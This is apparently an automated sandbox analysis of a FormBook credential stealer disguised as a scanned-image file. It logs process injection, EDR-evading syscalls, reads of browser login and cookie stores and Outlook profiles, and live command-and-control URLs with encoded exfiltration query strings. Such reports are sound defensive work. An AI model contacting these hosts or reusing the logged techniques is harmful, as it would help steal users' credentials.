            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread register set: target process: 3152Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread APC queued: target process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 22AD008Jump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A78C93 LogonUserW,0_2_00A78C93
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A23B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A23B4C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A24A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A24A35
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A84EF5 mouse_event,0_2_00A84EF5
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"Jump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A781F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00A781F7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A84C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00A84C03
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696182247.0000000001681000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696182247.0000000001681000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696182247.0000000001681000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4886B cpuid 0_2_00A4886B
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A550D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00A550D7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A62230 GetUserNameW,0_2_00A62230
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A5418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00A5418A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A24AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A24AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: WIN_81
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: WIN_XP
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: WIN_XPe
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: WIN_VISTA
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: WIN_7
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: WIN_8
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A96596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00A96596
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A96A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A96A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Scheduled Task/Job            		2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1494558 Sample: Scanned-IMGS_from Bumi Wang... Startdate: 18/08/2024 Architecture: WINDOWS Score: 100 28 www.zhuan-tou.com 2->28 30 www.winkthree.com 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 7 other signatures 2->48 10 Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 XraVxjqYYo.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 schtasks.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 XraVxjqYYo.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.slushcafe.top 203.161.55.102, 54135, 54136, 54137 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 synergon.space 109.95.158.127, 54123, 54124, 54125 DHOSTING-ASWarsawPolandPL Poland 22->36 38 8 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe76%ReversingLabsWin32.Trojan.Strab
            Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%URL Reputationsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%URL Reputationsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://hm.baidu.com/hm.js?0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%URL Reputationsafe
            http://www.slushcafe.top/irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            http://www.mqmsqkw.lol/jda9/0%Avira URL Cloudsafe
            http://www.alanbeanart.com/7ie4/0%Avira URL Cloudsafe
            http://www.alanbeanart.com/7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            http://www.8xbe578.app/1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.lfghtko.lol/yxos/0%Avira URL Cloudsafe
            http://www.a9jcpf.top/mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8100%Avira URL Cloudmalware
            http://www.rtrpodcast.online/l2ei/100%Avira URL Cloudmalware
            http://www.lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            https://dhosting.pl/bledyhttp/domeny.html0%Avira URL Cloudsafe
            https://dhosting.pl/img/logo.svg0%Avira URL Cloudsafe
            http://www.lecoinsa.net/7ffx/0%Avira URL Cloudsafe
            http://www.lfghtko.lol0%Avira URL Cloudsafe
            http://www.stemfiniti.com/toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            http://www.synergon.space/8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            http://www.slushcafe.top/irn0/0%Avira URL Cloudsafe
            http://www.zhuan-tou.com/pjmu/0%Avira URL Cloudsafe
            http://www.a9jcpf.top/mpex/100%Avira URL Cloudmalware
            http://www.tqfabxah.com/zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8100%Avira URL Cloudmalware
            https://dhosting.pl/kontakt0%Avira URL Cloudsafe
            http://www.lfghtko.lol/yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            http://www.tqfabxah.com/zjwj/100%Avira URL Cloudmalware
            http://www.kacotae.com/rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            https://dhosting.pl0%Avira URL Cloudsafe
            https://dhosting.pl/bledyhttp/hosting.html0%Avira URL Cloudsafe
            http://www.kacotae.com/rdfm/0%Avira URL Cloudsafe
            http://www.8xbe578.app/1nsp/0%Avira URL Cloudsafe
            http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbr0%Avira URL Cloudsafe
            http://www.mqmsqkw.lol/jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
